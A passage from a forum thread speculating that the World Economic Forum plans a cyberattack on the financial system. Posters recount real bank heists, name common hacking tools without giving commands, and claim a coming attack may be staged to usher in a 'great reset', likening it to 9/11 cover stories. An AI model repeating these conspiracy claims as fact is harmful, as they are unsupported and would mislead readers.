    We hope that you have found the exercise useful and insightful, and look forward to seeing you at the next Cyber Polygon events.
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  4. The Following 11 Users Say Thank You to Tintin For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Harmony (8th April 2021), mountain_jim (8th April 2021), O Donna (10th April 2021), palehorse (8th April 2021), Snoweagle (8th April 2021), TomKat (8th April 2021), toppy (8th April 2021), Yoda (8th April 2021)

  5. Link to Post #3
    Thailand Avalon Member palehorse's Avatar
    Join Date
    13th April 2020
    Location
    Thailand
    Language
    English
    Age
    43
    Posts
    567
    Thanks
    4,227
    Thanked 3,462 times in 532 posts

    Default Re: WEF planning cyber attack on financial system?

    Well.. I am wondering why they are talking about this again!?! It is not new news, that the financial system is weak and may collapse, to be frank I am hearing this thing since 2011 or even before that, in many occasions when I was connected on IRC servers, there was anonops channels available elsewhere, with many operations daily, things going from DDOS to large corporations to small ones hitting servers like KKK, Al-Qaeda, pedo's websites like Clinton family, non-profit organizations, universities.. and didn't stop there, database hacking was the most requested (and still) using tools like `sqlmap` and `havij` and browser exploitation tools like `beef` also vulns checks and hacking tools from the amazing `rapid7`, I worked as programmer and many times close to the penetration test guy (yeah I know weirdo name), specially when the company didn't want to pay an extra worker (it was part of my job to watch vulnerabilities and patch it), then I had to learn about these stuffs to know what the possible treat could be and be ready to mitigate problems if they arise, I got quite acquainted with many of these tools and I can assure you a 100% maybe 200%, almost the entire web is vulnerable (it is a freak show, everything is tested innumerous time), there is so many flaws or call it bugs that the majority are not even documented (some very famous Linux libraries has some major flaws that was never really addressed well, there is band-aids sort of thing) and there is no tools to test them (it is a live thing expanding quickly, very dynamic), what you find in xploits-db websites or CVE is just the tip of the iceberg, most real hackers will never disclosure a breach to such systems, they will exploit the breach as much as they can, in other words, they will milk the cow, leave the dead beef behind and go for the next target, many times the "security experts" can't detect all the "daemons" in their system, some are very hard to detect and they are stealth, one need really to watch close to find inconsistencies in the files. Remember stuxnet? The mainstream today call it "Computer program", truth is: it was a hell of hack, they just have to admit it.

    Most hacks are related to confidential data and if the hacker doesn't warn the company (make a joke of it, some love audience), the exploit can remain in place for a long time until someone find, some of these things are really undetectable. Remember you can't test a vulnerability against something that is not yet available, by the way that's how anti-virus/malware companies make their bucks.
    A very skilled hacker is also a master of patience, some hacking take years of planing, testing and execution, in the other hand some hacking are quickly done with an insider, I would not call it hacking, but the media does.

    Now backing to the banks, have heard of the "Beirut Bank Job"? Bangladeshi Central Bank hack? SWIFT security breaches? Sonali Bank heist in 2013? In Bangladeshi for example the hackers walked away with more than 80 million dollars, the target was 1 billion, but they failed and the FED and CBIAS which are the same **** took the blame (they are supposed to protect the smaller economies, which by the way blindly trust them). All these cases followed investigation and they found out that bank employees was probably acting as an accomplice, they also have high suspicious in the government of North Korea (Lazarus Group or BeagleBoyz, the FBI claimed to have a name of a North Korean man responsible and he was charged, but never arrested, also their claims has no name, which is very strange) and a ****ing Casino in China owned by a Chinese-Filipino, a few bank employees were arrested but there is no solid case and the money was never recovered. In total were more than 10 bank heists (hacking since 2013), the companies investigating say almost all has the same patterns of attack.

    quote from the article “Not a Question of If but When“, it says everything.

    A little bit off-topic but may interest someone
    This US show was made in 2015 and the entire hacking stuffs was researched with real hackers (some anonymous) and based on the ongoing world hacking events of earlier time, because they want the most accurate picture of what a hacker world really means, here Mr. Robot bring down the entire economic system with the help of his crew and people.. (the 1% of 1% that like to play God).

    The Plot
    "Elliot, a brilliant but highly unstable young cyber-security engineer and vigilante hacker, becomes a key figure in a complex game of global dominance when he and his shadowy allies try to take down the corrupt corporation he works for."

    If anyone have the time to watch, it is very informative. https://www.imdb.com/title/tt4158110/?ref_=fn_al_tt_1 (it is available in torrents everywhere).

    Also I would like to recommend these podcasts, very informative with people actively working in this industry >>> https://darknetdiaries.com/

    I would not be surprised if the entire thing is staged, and when the next one occur it will render the entire financial system obsolete, because in fact that's what they want, a great reset.
    Last edited by palehorse; 8th April 2021 at 13:50. Reason: added podcast recommendation
    --
    A chaos to the sense, a Kosmos to the reason.

  6. The Following 6 Users Say Thank You to palehorse For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), O Donna (10th April 2021), TomKat (8th April 2021), toppy (8th April 2021)

  7. Link to Post #4
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    1,821
    Thanks
    1,336
    Thanked 7,816 times in 1,607 posts

    Default Re: WEF planning cyber attack on financial system?

    Quote Posted by palehorse (here)
    Well.. I am wondering why they are talking about this again!?!
    They have to set up the cover story ahead of time. Like they did with 9/11. So that, when it happened, "everybody knew" it was Bin Laden.

  8. The Following 7 Users Say Thank You to TomKat For This Post:

    Ba-ba-Ra (8th April 2021), Bill Ryan (11th April 2021), gord (8th April 2021), Miha (11th April 2021), O Donna (10th April 2021), palehorse (8th April 2021), toppy (8th April 2021)

  9. Link to Post #5
    Avalon Member Andre's Avatar
    Join Date
    9th July 2010
    Location
    Byron Bay Area
    Language
    English
    Posts
    405
    Thanks
    302
    Thanked 1,937 times in 374 posts

    Default Re: WEF planning cyber attack on financial system?

    Very interesting post. Thanks TomKat! Will look at this more closely when I have some time.
    Our destiny is in our hands. Let us visualise a world of truth, freedom and equality.

  10. The Following User Says Thank You to Andre For This Post:

    Bill Ryan (11th April 2021)

  11. Link to Post #6
    UK Moderator/Librarian/Administrator Tintin's Avatar
    Join Date
    3rd June 2017
    Location
    Trowbridge/Bath - UK
    Age
    51
    Posts
    3,077
    Thanks
    29,055
    Thanked 21,745 times in 3,047 posts

    Default Re: WEF planning cyber attack on financial system?

    Israel appears to confirm it carried out cyberattack on Iran nuclear facility

    Is this a part of the exercise I wonder
    “If a man does not keep pace with [fall into line with] his companions, perhaps it is because he hears a different drummer. Let him step to the music which he hears, however measured or far away.” - Thoreau

  12. The Following 4 Users Say Thank You to Tintin For This Post:

    Bill Ryan (11th April 2021), gord (11th April 2021), palehorse (12th April 2021), Sunny (14th April 2021)

  13. Link to Post #7
    Canada Avalon Member TomKat's Avatar
    Join Date
    23rd September 2017
    Posts
    1,821
    Thanks
    1,336
    Thanked 7,816 times in 1,607 posts

    Default Re: WEF planning cyber attack on financial system?

    Last night on 60 Minutes, Jerome Powell reiterated that the most concerning threat is a cyber attack on the financial system. They might need to bring down the whole system to bring in the new one.

  14. The Following 2 Users Say Thank You to TomKat For This Post:

    Miha (13th April 2021), palehorse (13th April 2021)

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts